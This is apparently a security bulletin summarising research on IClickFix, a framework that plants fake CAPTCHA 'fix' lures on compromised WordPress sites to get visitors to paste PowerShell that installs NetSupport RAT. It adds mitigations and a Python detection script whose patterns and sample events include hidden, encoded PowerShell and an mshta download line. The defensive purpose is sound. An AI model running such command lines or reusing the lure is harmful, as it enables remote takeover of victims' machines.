Current Cyber Threats

Meet IClickfix: A Widespread Wordpress-Targeting Framework Using the Clickfix Tactic

Summary:
Sekoia.io researchers have identified a widespread malicious framework dubbed "IClickFix," which automates the deployment of the "ClickFix" social engineering tactic across compromised WordPress websites. Unlike previous iterations of ClickFix that were often part of highly targeted or manual campaigns, IClickFix is a modular JavaScript-based framework designed for mass distribution. The attack chain begins when a user visits a legitimate but compromised WordPress site. The framework injects a multi-stage JavaScript loader that hijacks the page, replacing the original content with a fake Cloudflare Turnstile CAPTCHA or an "unusual traffic detected" alert. When the user attempts to solve the CAPTCHA by clicking a button, they are presented with instructions to "fix" the error by copying a command to their clipboard and pasting it into the Windows Run dialog or a PowerShell terminal. This command executes an obfuscated PowerShell script that bypasses traditional browser security controls—since the browser itself never downloads a file—and ultimately installs the NetSupport Remote Access Trojan (RAT). While the lure is visually similar to the well-known "ClearFake" cluster, Sekoia assesses with high confidence that IClickFix is a distinct, slightly less sophisticated framework likely operated by different cybercriminals.


Security Officer Comments:
The emergence of IClickFix is particularly concerning because it targets the human element at a point where technical controls are often weakest. By tricking users into manually executing commands, the threat actors effectively bypass "Safe Browsing" features in Chrome or Edge that would typically flag a malicious download. For members spanning critical infrastructure, service providers, and software developers, this poses a two-sided risk. First, organizations' own public-facing WordPress sites could be compromised and used as "watering holes" to infect their customers, leading to significant reputational and supply-chain damage. Second, employees across all sectors are susceptible to these lures, as CAPTCHA challenges are a routine part of the modern web experience.

The delivery of NetSupport RAT is often just the "foot in the door." Once this RAT is established, it provides attackers with full remote control, which can be leveraged for lateral movement, credential harvesting, or as a precursor to ransomware deployment. The use of a Traffic Distribution System (TDS) by the IClickFix operators further complicates detection, as it allows them to filter traffic and only serve the malicious payload to specific targets (e.g., users from specific geographic regions or using specific operating systems), making the framework highly resilient against automated security scanners.


Suggested Corrections:
To defend against the IClickFix framework and the broader ClickFix tactic, we recommend a multi-layered approach focusing on both endpoint hardening and user awareness:
  • Endpoint PowerShell Restrictions: The most effective technical mitigation is to restrict PowerShell execution for standard users. Implementing Constrained Language Mode (CLM) and using Windows Defender Application Control (WDAC) or AppLocker to block the execution of unsigned scripts can prevent the final stage of the attack from succeeding.
  • User Awareness Training: Traditional "don't click links" training is insufficient for this threat. Organizations should specifically educate employees on the "ClickFix" lure—reminding them that legitimate services (like Cloudflare, Google, or Microsoft) will never ask a user to copy and paste a command into the Windows Run box or a terminal to "fix" a browser error.
  • WordPress Security Hardening: For members hosting WordPress sites, it is critical to implement rigorous plugin management and integrity monitoring. Ensure all themes and plugins are updated, utilize Multi-Factor Authentication (MFA) for administrative logins, and use Web Application Firewalls (WAF) to detect and block the injection of malicious JavaScript tags, specifically looking for indicators like ic-tracker-js.
  • Behavioral Detection (EDR): Configure EDR solutions to alert on suspicious process parent-child relationships, such as a browser process or explorer.exe (the parent of anything launched from the Run dialog) spawning powershell.exe with highly encoded or obfuscated command-line arguments. Monitoring for bitsadmin.exe or mshta.exe usage to download external files is also a key detection opportunity.
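To make the EDR bullet concrete, here is an added example (written for this summary, not Sekoia's or any vendor's code) that scores process-creation records for the ClickFix pattern described above: a LOLBin launched under explorer.exe or a browser with encoded, hidden-window or download-style arguments, with the -EncodedCommand blob decoded for triage. The parent/child lists, indicator weights, and sample records are assumptions constructed for the example.

```python
import base64
import re

# Parents that imply a user-driven launch (Run dialog or a browser) and the LOLBin children named in the advisory. Constructed lists; tune to your fleet.
USER_LAUNCH_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "bitsadmin.exe"}
ENC_RX = re.compile(r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{40,})")
# (weight, pattern): strong indicators score 2, noisier ones score 1.
SUSPICIOUS_ARGS = [
    (2, ENC_RX),
    (2, re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|invoke-webrequest|irm)\b")),
    (2, re.compile(r"(?i)\bhttps?://")),
    (1, re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+h(idden)?")),
    (1, re.compile(r"(?i)(^|\s)-(nop|noprofile)\b")),
]

def decode_encoded_command(command_line):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or None."""
    m = ENC_RX.search(command_line)
    try:
        return base64.b64decode(m.group(3)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(parent_image, image, command_line):
    """Score one process-creation record; returns (score, reasons)."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = image.rsplit("\\", 1)[-1].lower()
    if parent not in USER_LAUNCH_PARENTS or child not in LOLBIN_CHILDREN:
        return 0, []  # service- or scheduler-spawned PowerShell is out of scope here
    score, reasons = 1, [f"{child} launched from {parent}"]
    for weight, rx in SUSPICIOUS_ARGS:
        if rx.search(command_line):
            score, reasons = score + weight, reasons + [f"+{weight}: {rx.pattern}"]
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        score, reasons = score + 1, reasons + [f"+1: payload decodes to {decoded[:50]!r}"]
    return score, reasons

def is_clickfix_like(parent_image, image, command_line, threshold=3):
    return score_event(parent_image, image, command_line)[0] >= threshold

# Constructed sample telemetry (parent, image, command line). The encoded payload is a harmless Write-Output encoded like a pasted Run-dialog one-liner; the URL is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_PAYLOAD = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", PS, f"powershell.exe -w hidden -nop -ep bypass -enc {_PAYLOAD}"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta.exe https://example.invalid/verify"),
    (r"C:\Windows\System32\services.exe", PS, r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    (r"C:\Windows\explorer.exe", PS, "powershell.exe"),  # user opened a console by hand: parent match only
]
```

Run `score_event(*ev)` over each SAMPLE_EVENTS entry to see the reasons list; only the first two records reach the threshold.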

Link(s):
https://blog.sekoia.io/meet-iclickf...argeting-framework-using-the-clickfix-tactic/